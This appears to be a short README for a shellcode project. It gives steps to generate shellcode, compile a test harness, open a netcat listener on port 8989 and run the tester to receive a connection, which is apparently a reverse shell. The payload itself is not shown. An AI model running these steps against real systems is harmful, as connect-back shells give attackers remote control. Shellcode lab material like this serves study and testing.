Generate the shellcode :
makePaste the output inside de code variable in test_shellcode.c.
Compile the shellcode tester:
make build_testStart a listener on another terminal :
nc -lvnp 8989Then execute the tester :
./build/test_shellcodeNow you should see the connection on your listener !